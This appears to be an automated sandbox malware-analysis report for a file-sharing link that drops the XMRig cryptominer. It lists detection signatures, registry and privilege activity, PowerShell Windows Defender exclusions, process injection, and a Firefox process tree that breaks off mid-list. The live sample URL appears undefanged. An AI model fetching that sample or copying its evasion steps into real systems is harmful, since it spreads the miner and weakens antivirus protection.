xmrig | hxxps://easyupload[.]io/38egea

Analysis

max time kernel
1799s
max time network
1803s
platform
windows10-1703_x64
resource
win10-20240611-en
resource tags

arch:x64arch:x86image:win10-20240611-enlocale:en-usos:windows10-1703-x64system
submitted
14/07/2024, 08:54

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://easyupload.io/38egea

Score

10^/10

xmrig execution miner

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 8 IoCs

miner

resource	yara_rule
behavioral1/memory/8236-1370-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/8236-1374-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/8236-1396-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/8236-1395-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/8236-1394-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/8236-1393-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/8236-1392-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/8236-1453-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
9208	powershell.exe
5848	powershell.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 8860 set thread context of 8236	8860	conhost.exe	121

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\rescache\_merged\1601268389\715946058.pri	taskmgr.exe
File created	C:\Windows\rescache\_merged\4183903823\2290032291.pri	taskmgr.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Checks processor information in registry 2 TTPs 8 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings	firefox.exe

NTFS ADS 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\Downloads\m10.zip:Zone.Identifier	firefox.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
9208	powershell.exe
9208	powershell.exe
9208	powershell.exe
5848	powershell.exe
5848	powershell.exe
5848	powershell.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
7720	taskmgr.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
656	Process not Found

Suspicious use of AdjustPrivilegeToken 53 IoCs

description	pid	Process
Token: SeDebugPrivilege	1444	firefox.exe
Token: SeDebugPrivilege	1444	firefox.exe
Token: SeDebugPrivilege	1444	firefox.exe
Token: SeDebugPrivilege	8860	conhost.exe
Token: SeDebugPrivilege	9208	powershell.exe
Token: SeLockMemoryPrivilege	8236	notepad.exe
Token: SeLockMemoryPrivilege	8236	notepad.exe
Token: SeIncreaseQuotaPrivilege	9208	powershell.exe
Token: SeSecurityPrivilege	9208	powershell.exe
Token: SeTakeOwnershipPrivilege	9208	powershell.exe
Token: SeLoadDriverPrivilege	9208	powershell.exe
Token: SeSystemProfilePrivilege	9208	powershell.exe
Token: SeSystemtimePrivilege	9208	powershell.exe
Token: SeProfSingleProcessPrivilege	9208	powershell.exe
Token: SeIncBasePriorityPrivilege	9208	powershell.exe
Token: SeCreatePagefilePrivilege	9208	powershell.exe
Token: SeBackupPrivilege	9208	powershell.exe
Token: SeRestorePrivilege	9208	powershell.exe
Token: SeShutdownPrivilege	9208	powershell.exe
Token: SeDebugPrivilege	9208	powershell.exe
Token: SeSystemEnvironmentPrivilege	9208	powershell.exe
Token: SeRemoteShutdownPrivilege	9208	powershell.exe
Token: SeUndockPrivilege	9208	powershell.exe
Token: SeManageVolumePrivilege	9208	powershell.exe
Token: 33	9208	powershell.exe
Token: 34	9208	powershell.exe
Token: 35	9208	powershell.exe
Token: 36	9208	powershell.exe
Token: SeDebugPrivilege	5848	powershell.exe
Token: SeIncreaseQuotaPrivilege	5848	powershell.exe
Token: SeSecurityPrivilege	5848	powershell.exe
Token: SeTakeOwnershipPrivilege	5848	powershell.exe
Token: SeLoadDriverPrivilege	5848	powershell.exe
Token: SeSystemProfilePrivilege	5848	powershell.exe
Token: SeSystemtimePrivilege	5848	powershell.exe
Token: SeProfSingleProcessPrivilege	5848	powershell.exe
Token: SeIncBasePriorityPrivilege	5848	powershell.exe
Token: SeCreatePagefilePrivilege	5848	powershell.exe
Token: SeBackupPrivilege	5848	powershell.exe
Token: SeRestorePrivilege	5848	powershell.exe
Token: SeShutdownPrivilege	5848	powershell.exe
Token: SeDebugPrivilege	5848	powershell.exe
Token: SeSystemEnvironmentPrivilege	5848	powershell.exe
Token: SeRemoteShutdownPrivilege	5848	powershell.exe
Token: SeUndockPrivilege	5848	powershell.exe
Token: SeManageVolumePrivilege	5848	powershell.exe
Token: 33	5848	powershell.exe
Token: 34	5848	powershell.exe
Token: 35	5848	powershell.exe
Token: 36	5848	powershell.exe
Token: SeDebugPrivilege	7720	taskmgr.exe
Token: SeSystemProfilePrivilege	7720	taskmgr.exe
Token: SeCreateGlobalPrivilege	7720	taskmgr.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
1444	firefox.exe
1444	firefox.exe
1444	firefox.exe
1444	firefox.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
1444	firefox.exe
1444	firefox.exe
1444	firefox.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe
7720	taskmgr.exe

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
1444	firefox.exe
1444	firefox.exe
1444	firefox.exe
1444	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2176 wrote to memory of 1444	2176	firefox.exe	71
PID 2176 wrote to memory of 1444	2176	firefox.exe	71
PID 2176 wrote to memory of 1444	2176	firefox.exe	71
PID 2176 wrote to memory of 1444	2176	firefox.exe	71
PID 2176 wrote to memory of 1444	2176	firefox.exe	71
PID 2176 wrote to memory of 1444	2176	firefox.exe	71
PID 2176 wrote to memory of 1444	2176	firefox.exe	71
PID 2176 wrote to memory of 1444	2176	firefox.exe	71
PID 2176 wrote to memory of 1444	2176	firefox.exe	71
PID 2176 wrote to memory of 1444	2176	firefox.exe	71
PID 2176 wrote to memory of 1444	2176	firefox.exe	71
PID 1444 wrote to memory of 2000	1444	firefox.exe	72
PID 1444 wrote to memory of 2000	1444	firefox.exe	72
PID 1444 wrote to memory of 3584	1444	firefox.exe	73
PID 1444 wrote to memory of 3584	1444	firefox.exe	73
PID 1444 wrote to memory of 3584	1444	firefox.exe	73
PID 1444 wrote to memory of 3584	1444	firefox.exe	73
PID 1444 wrote to memory of 3584	1444	firefox.exe	73
PID 1444 wrote to memory of 3584	1444	firefox.exe	73
PID 1444 wrote to memory of 3584	1444	firefox.exe	73
PID 1444 wrote to memory of 3584	1444	firefox.exe	73
PID 1444 wrote to memory of 3584	1444	firefox.exe	73
PID 1444 wrote to memory of 3584	1444	firefox.exe	73
PID 1444 wrote to memory of 3584	1444	firefox.exe	73
PID 1444 wrote to memory of 3584	1444	firefox.exe	73
PID 1444 wrote to memory of 3584	1444	firefox.exe	73
PID 1444 wrote to memory of 3584	1444	firefox.exe	73
PID 1444 wrote to memory of 3584	1444	firefox.exe	73
PID 1444 wrote to memory of 3584	1444	firefox.exe	73
PID 1444 wrote to memory of 3584	1444	firefox.exe	73
PID 1444 wrote to memory of 3584	1444	firefox.exe	73
PID 1444 wrote to memory of 3584	1444	firefox.exe	73
PID 1444 wrote to memory of 3584	1444	firefox.exe	73
PID 1444 wrote to memory of 3584	1444	firefox.exe	73
PID 1444 wrote to memory of 3584	1444	firefox.exe	73
PID 1444 wrote to memory of 3584	1444	firefox.exe	73
PID 1444 wrote to memory of 3584	1444	firefox.exe	73
PID 1444 wrote to memory of 3584	1444	firefox.exe	73
PID 1444 wrote to memory of 3584	1444	firefox.exe	73
PID 1444 wrote to memory of 3584	1444	firefox.exe	73
PID 1444 wrote to memory of 3584	1444	firefox.exe	73
PID 1444 wrote to memory of 3584	1444	firefox.exe	73
PID 1444 wrote to memory of 3584	1444	firefox.exe	73
PID 1444 wrote to memory of 3584	1444	firefox.exe	73
PID 1444 wrote to memory of 3584	1444	firefox.exe	73
PID 1444 wrote to memory of 3584	1444	firefox.exe	73
PID 1444 wrote to memory of 3584	1444	firefox.exe	73
PID 1444 wrote to memory of 3584	1444	firefox.exe	73
PID 1444 wrote to memory of 3584	1444	firefox.exe	73
PID 1444 wrote to memory of 3584	1444	firefox.exe	73
PID 1444 wrote to memory of 3584	1444	firefox.exe	73
PID 1444 wrote to memory of 3584	1444	firefox.exe	73
PID 1444 wrote to memory of 3584	1444	firefox.exe	73
PID 1444 wrote to memory of 3584	1444	firefox.exe	73
PID 1444 wrote to memory of 3584	1444	firefox.exe	73
PID 1444 wrote to memory of 3584	1444	firefox.exe	73
PID 1444 wrote to memory of 3584	1444	firefox.exe	73
PID 1444 wrote to memory of 3584	1444	firefox.exe	73
PID 1444 wrote to memory of 3584	1444	firefox.exe	73
PID 1444 wrote to memory of 3584	1444	firefox.exe	73
PID 1444 wrote to memory of 3584	1444	firefox.exe	73
PID 1444 wrote to memory of 3952	1444	firefox.exe	74
PID 1444 wrote to memory of 3952	1444	firefox.exe	74
PID 1444 wrote to memory of 3952	1444	firefox.exe	74

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "https://easyupload.io/38egea"
1⤵
- Suspicious use of WriteProcessMemory
PID:2176
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url https://easyupload.io/38egea
  2⤵
  - Checks processor information in registry
  - Modifies registry class
  - NTFS ADS
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:1444
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1444.0.1105292535\1714785297" -parentBuildID 20221007134813 -prefsHandle 1656 -prefMapHandle 1672 -prefsLen 20767 -prefMapSize 233414 -appDir "C:\Program Files\Mozilla Firefox\browser" - {04bb7192-ff5c-4a98-b684-f611300ac611} 1444 "\\.\pipe\gecko-crash-server-pipe.1444" 1780 1b7bc9d6758 gpu
    3⤵
    PID:2000
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1444.1.2008828482\397332147" -parentBuildID 20221007134813 -prefsHandle 2128 -prefMapHandle 2124 -prefsLen 21628 -prefMapSize 233414 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {11a4d955-8c61-49dc-a9e7-fcb66d17abef} 1444 "\\.\pipe\gecko-crash-server-pipe.1444" 2140 1b7bc8f9258 socket
    3⤵
    - Checks processor information in registry
    PID:3584
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1444.2.1943529711\652019803" -childID 1 -isForBrowser -prefsHandle 2804 -prefMapHandle 2752 -prefsLen 21731 -prefMapSize 233414 -jsInitHandle 1312 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {18d08066-45b6-4082-a675-8f069b3c10bf} 1444 "\\.\pipe\gecko-crash-server-pipe.1444" 2716 1b7c06d9458 tab
    3⤵
    PID:3952
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1444.3.586960968\1433433830" -childID 2 -isForBrowser -prefsHandle 3564 -prefMapHandle 3560 -prefsLen 26136 -prefMapSize 233414 -jsInitHandle 1312 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5138c04a-a661-4098-b154-b54e6c7a7bf5} 1444 "\\.\pipe\gecko-crash-server-pipe.1444" 3576 1b7c188c358 tab
    3⤵
    PID:5056
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1444.4.315575303\1901834237" -childID 3 -isForBrowser -prefsHandle 4616 -prefMapHandle 4612 -prefsLen 26271 -prefMapSize 233414 -jsInitHandle 1312 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b099db87-dc5a-4612-9514-b1d2af7a7d36} 1444 "\\.\pipe\gecko-crash-server-pipe.1444" 2672 1b7c2922958 tab
    3⤵
    PID:3588
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1444.5.837161947\1980797155" -childID 4 -isForBrowser -prefsHandle 4764 -prefMapHandle 4768 -prefsLen 26271 -prefMapSize 233414 -jsInitHandle 1312 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {95a4d20a-cf9b-4275-8455-3c9cf7f7db83} 1444 "\\.\pipe\gecko-crash-server-pipe.1444" 4756 1b7c2922c58 tab
    3⤵
    PID:1464
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1444.6.1015914611\1952092909" -childID 5 -isForBrowser -prefsHandle 5036 -prefMapHandle 5032 -prefsLen 26271 -prefMapSize 233414 -jsInitHandle 1312 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {caa1e40c-190f-4e5c-b52c-1001b0990e34} 1444 "\\.\pipe\gecko-crash-server-pipe.1444" 4952 1b7c292c858 tab
    3⤵
    PID:3480
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1444.7.749544461\2000883428" -childID 6 -isForBrowser -prefsHandle 9580 -prefMapHandle 9412 -prefsLen 26370 -prefMapSize 233414 -jsInitHandle 1312 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {9e4c3ad8-c519-4313-859f-39618676f4d5} 1444 "\\.\pipe\gecko-crash-server-pipe.1444" 9428 1b7c45fd958 tab
    3⤵
    PID:4912
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1444.8.880579356\1657530035" -childID 7 -isForBrowser -prefsHandle 9372 -prefMapHandle 9096 -prefsLen 26370 -prefMapSize 233414 -jsInitHandle 1312 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {7fba4cb4-dd83-43b0-b2f5-518255b87548} 1444 "\\.\pipe\gecko-crash-server-pipe.1444" 9208 1b7c2922f58 tab
    3⤵
    PID:1708
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1444.9.169623459\553799967" -childID 8 -isForBrowser -prefsHandle 3880 -prefMapHandle 3888 -prefsLen 26370 -prefMapSize 233414 -jsInitHandle 1312 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8f378dea-d8b4-4e51-88aa-681de82c7f0b} 1444 "\\.\pipe\gecko-crash-server-pipe.1444" 2600 1b7c3acf858 tab
    3⤵
    PID:3236
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1444.10.1628837336\1329068380" -childID 9 -isForBrowser -prefsHandle 2696 -prefMapHandle 2692 -prefsLen 26370 -prefMapSize 233414 -jsInitHandle 1312 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d2b7b12e-83dd-4723-aca9-0417b5b8d939} 1444 "\\.\pipe\gecko-crash-server-pipe.1444" 3912 1b7c3ace958 tab
    3⤵
    PID:204
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1444.11.1698028405\752820368" -childID 10 -isForBrowser -prefsHandle 2776 -prefMapHandle 2772 -prefsLen 26370 -prefMapSize 233414 -jsInitHandle 1312 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {bc8bd1ac-ace4-4942-96a2-120fd148d126} 1444 "\\.\pipe\gecko-crash-server-pipe.1444" 8940 1b7c3c19858 tab
    3⤵
    PID:3168
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1444.12.462458334\973952232" -childID 11 -isForBrowser -prefsHandle 8920 -prefMapHandle 2760 -prefsLen 26370 -prefMapSize 233414 -jsInitHandle 1312 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {fed424d9-cc0b-4ef5-84a0-8fed24e0cf6b} 1444 "\\.\pipe\gecko-crash-server-pipe.1444" 8776 1b7b1765c58 tab
    3⤵
    PID:2256
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1444.13.449042438\313095123" -childID 12 -isForBrowser -prefsHandle 3496 -prefMapHandle 3492 -prefsLen 26370 -prefMapSize 233414 -jsInitHandle 1312 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {95eae1fa-7c72-40d6-9e63-7de7673759d7} 1444 "\\.\pipe\gecko-crash-server-pipe.1444" 9320 1b7c3c1b658 tab
    3⤵
    PID:2332
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1444.14.1480119941\894127235" -childID 13 -isForBrowser -prefsHandle 8788 -prefMapHandle 9320 -prefsLen 26370 -prefMapSize 233414 -jsInitHandle 1312 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {896a3728-00aa-42cc-b3b0-a73ca86733f2} 1444 "\\.\pipe\gecko-crash-server-pipe.1444" 8124 1b7b1730b58 tab
    3⤵
    PID:4348
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1444.15.509993111\936702771" -childID 14 -isForBrowser -prefsHandle 8124 -prefMapHandle 4932 -prefsLen 26370 -prefMapSize 233414 -jsInitHandle 1312 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {289ce80c-c34a-49cd-9614-449c96779858} 1444 "\\.\pipe\gecko-crash-server-pipe.1444" 8020 1b7c3e28258 tab
    3⤵
    PID:5000
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1444.16.855689141\988222977" -childID 15 -isForBrowser -prefsHandle 8036 -prefMapHandle 7896 -prefsLen 26370 -prefMapSize 233414 -jsInitHandle 1312 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {1ecb18d9-6580-44ae-80e8-bd7677a89bb8} 1444 "\\.\pipe\gecko-crash-server-pipe.1444" 7800 1b7c3e96858 tab
    3⤵
    PID:3204
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1444.17.376209138\572360944" -childID 16 -isForBrowser -prefsHandle 7472 -prefMapHandle 7476 -prefsLen 26370 -prefMapSize 233414 -jsInitHandle 1312 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c9146cca-6429-41cc-9527-1ec8d256e602} 1444 "\\.\pipe\gecko-crash-server-pipe.1444" 7616 1b7c406d258 tab
    3⤵
    PID:96
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1444.18.1376622659\119721432" -childID 17 -isForBrowser -prefsHandle 8228 -prefMapHandle 8224 -prefsLen 26370 -prefMapSize 233414 -jsInitHandle 1312 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {12e7b5d7-915c-4dc3-9773-7cd59d0fdbb0} 1444 "\\.\pipe\gecko-crash-server-pipe.1444" 7432 1b7c407e658 tab
    3⤵
    PID:1664
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1444.19.1206609740\1669954863" -childID 18 -isForBrowser -prefsHandle 8136 -prefMapHandle 8132 -prefsLen 26370 -prefMapSize 233414 -jsInitHandle 1312 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {84b15646-03c5-4753-a97e-5d3b84ea4e97} 1444 "\\.\pipe\gecko-crash-server-pipe.1444" 8392 1b7c34e8e58 tab
    3⤵
    PID:5124
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1444.20.472524149\1102098747" -childID 19 -isForBrowser -prefsHandle 7896 -prefMapHandle 8020 -prefsLen 26370 -prefMapSize 233414 -jsInitHandle 1312 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0ba0ff9c-62eb-4226-94d7-57d802dcba14} 1444 "\\.\pipe\gecko-crash-server-pipe.1444" 7296 1b7c4958f58 tab
    3⤵
    PID:5456
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1444.21.1609164901\573269750" -childID 20 -isForBrowser -prefsHandle 8392 -prefMapHandle 2544 -prefsLen 26370 -prefMapSize 233414 -jsInitHandle 1312 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {69cb83f1-4f52-4373-a7a7-c24cba65561f} 1444 "\\.\pipe\gecko-crash-server-pipe.1444" 7008 1b7c4daf958 tab
    3⤵
    PID:5816
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1444.22.32545160\1269887575" -childID 21 -isForBrowser -prefsHandle 6828 -prefMapHandle 6888 -prefsLen 26370 -prefMapSize 233414 -jsInitHandle 1312 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {856c72c0-79c2-4862-9338-97675720bd2f} 1444 "\\.\pipe\gecko-crash-server-pipe.1444" 6820 1b7c56c8258 tab
    3⤵
    PID:6056
- - C:\Program Files\Mozilla Firefox\firefox.exe
